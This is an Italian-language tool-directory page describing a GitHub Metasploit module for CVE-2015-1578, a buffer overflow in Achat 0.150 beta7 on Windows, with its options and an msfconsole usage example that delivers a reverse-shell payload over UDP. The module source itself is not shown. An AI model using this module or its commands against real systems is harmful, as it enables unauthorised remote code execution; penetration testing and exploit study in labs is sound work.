Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2015-1578-PoC-Metasploit — Questo è un exploit proof-of-concept del modulo Metasploit per CVE-2015-1578, una vulnerabilità di buffer overflow in Achat 0.150 beta7 su Windows. Lo sfruttamento porta all'esecuzione remota di codice tramite un pacchetto UDP appositamente creato. | Kitploit
Strumenti/GitHubGitHub/yaldobaoth/cve-2015-1578-poc-metasploit
Frameworks per Penetration TestingFramework di ExploitAnalisi delle VulnerabilitàExploitShellcodeStrumento di Accesso RemotoGenerazione di ShellcodeSviluppo PayloadBinary Exploitation
GitHubyaldobaoth/cve-2015-1578-poc-metasploit

CVE-2015-1578-PoC-Metasploit

Questo è un exploit proof-of-concept del modulo Metasploit per CVE-2015-1578, una vulnerabilità di buffer overflow in Achat 0.150 beta7 su Windows. Lo sfruttamento porta all'esecuzione remota di codice tramite un pacchetto UDP appositamente creato.

Vedi Repository
131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Modulo Metasploit per CVE-2015-1578

Panoramica

Questo è un modulo Metasploit per CVE-2015-1578, una vulnerabilità di buffer overflow in Achat 0.150 beta7 su Windows. Lo sfruttamento porta all'esecuzione remota di codice tramite un pacchetto UDP appositamente predisposto.

Scopo

Questo modulo è progettato per fungere da esempio pulito, minimale e ben strutturato dello sviluppo di exploit per Metasploit. Dimostra:

  • Generazione dinamica di shellcode codificato in Unicode tramite msfvenom
  • Iniezione manuale del payload (aggirando l'encoder di payload interno di Metasploit)
  • Meccanismo di consegna semplice basato su UDP
  • Integrazione nel Metasploit Framework utilizzando il caricamento di moduli personalizzati

Tutorial Video

Tutorial Video

Dipendenze

  • Metasploit Framework
  • msfvenom nel tuo
$PATH

Caratteristiche

  • Utilizza msfvenom per generare un payload con codifica x86/unicode_mixed e caratteri dannosi personalizzati
  • Evita il sistema di codifica dei payload integrato di Metasploit per aggirare le limitazioni dell'encoder

Installazione

root@kitploit:~
./install.sh

Quindi avvia Metasploit ed esegui:

root@kitploit:~
reload_all
use exploit/windows/yaldobaoth/achat_bof

Opzioni

  • RHOSTS – Indirizzo IP del target (obbligatorio)
  • LHOST – Indirizzo IP locale per la shell inversa (obbligatorio)
  • LPORT – Porta locale per la shell inversa (predefinita: 4444)
  • RPORT – Porta UDP remota sul target (predefinita: 9256)

Esempio di utilizzo

root@kitploit:~
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run

Questo farà:

  • Generare un payload di shell inversa compatibile con Unicode tramite msfvenom
  • Iniettarlo nel buffer vulnerabile di Achat tramite UDP
  • Ascoltare la shell sul LHOST:LPORT specificato
Scarica lo strumento